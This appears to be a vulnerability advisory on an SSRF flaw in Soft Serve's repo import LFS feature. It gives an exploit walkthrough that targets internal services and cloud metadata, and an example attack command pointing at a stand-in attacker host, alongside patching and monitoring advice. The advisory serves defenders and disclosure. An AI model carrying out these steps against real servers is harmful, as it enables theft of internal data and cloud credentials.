Listen to this Post
CVE-2026-30832 details a critical Server-Side Request Forgery (SSRF) vulnerability in Charmbracelet’s Soft Serve, a self-hostable Git server . The flaw resides in the `repo import` functionality for versions from 0.6.0 up to, but not including, 0.11.4 . An authenticated attacker can exploit this by running a repo import with a maliciously crafted `–lfs-endpoint` URL. The Soft Serve server, when processing this Git LFS endpoint, makes an initial HTTP request to the provided URL. This first request is considered “blind” because the response, even if from an internal service, will not parse as valid LFS JSON, so no data is immediately returned . However, an attacker who controls this external endpoint can escalate the attack. By hosting a fake LFS server, the attacker can respond to the initial batch request with a list of malicious download URLs. These URLs can point to internal or private IP addresses and services (e.g., `http://127.0.0.1/admin`, `http://10.0.0.5/internal-api`) . The vulnerable Soft Serve server will then make follow-up HTTP requests to these internal targets, fetching data and effectively returning it to the attacker through the LFS protocol flow, thus granting full read access to internal services . The issue is resolved in Soft Serve version 0.11.4 .
dailycve form:
Platform: Soft Serve
Version: 0.6.0 to <0.11.4
Vulnerability : Server-Side Request Forgery
Severity: Critical (9.1)
date: March 7, 2026
Prediction: Patch already available (v0.11.4)
What Undercode Say:
Analytics:
– CWE: CWE-918 (Server-Side Request Forgery)
– CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
– Attack Complexity: Low
– Privileges Required: Low (Authenticated SSH user)
– Scope: Changed (Compromising server allows access to internal network)
– Exploitability: Proof-of-Concept chaining is possible with a malicious LFS server.
– Fix Commitment: Vendor (Charmbracelet) patched in v0.11.4 within days of public disclosure.
Bash Commands & Code Analysis:
Example of a malicious import command an attacker might run soft serve repo import --name victim-repo --lfs-endpoint "http://attacker.com/malicious-lfs" https://github.com/example/repo.git To check your current version soft --version Update to the patched version using Go go install github.com/charmbracelet/soft-serve/cmd/[email protected] Or if installed via package manager (example for Debian/Ubuntu) sudo apt update && sudo apt upgrade soft-serve Check running processes for Soft Serve to confirm version ps aux | grep soft-serve
How Exploit:
1. Authenticate: Gain valid SSH access to the Soft Serve server.
2. Craft Endpoint: Set up a public server with a malicious LFS endpoint that returns HTTP redirects or download URLs pointing to internal targets (e.g., `http://169.254.169.254/latest/meta-data/` for cloud metadata).
3. Trigger Import: Run `soft serve repo import` with the `–lfs-endpoint` argument pointing to the malicious server.
4. Chain Request: The fake LFS server responds to the batch request with a download URL targeting an internal service.
5. Exfiltrate: Soft Serve fetches the internal resource and the attacker reads the data via the LFS protocol .
Protection from this CVE:
- Patch Immediately: Upgrade to Soft Serve version 0.11.4 or later .
- Network Segmentation: Restrict outbound HTTP traffic from the Soft Serve server to the internal network if not strictly necessary.
- Input Validation: As a defense-in-depth measure, ensure no internal IP ranges or `localhost` can be specified in LFS endpoints (though the patch addresses this at the source).
- Monitor Logs: Review Soft Serve logs for `repo import` commands with suspicious `–lfs-endpoint` URLs pointing to external IPs.
Impact:
- Confidentiality (High): An attacker can read arbitrary data from internal web services, including cloud metadata (IAM credentials), internal dashboards, and API endpoints.
- Lateral Movement: The SSRF can be used to scan and map the internal network, identifying live hosts and vulnerable services behind the firewall.
- Integrity (Low): Potential to make POST requests to internal APIs if they are idempotent or have low authentication, though the primary vector is read-only.
- Availability (Low): Could potentially send requests that crash internal services, leading to denial of service.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
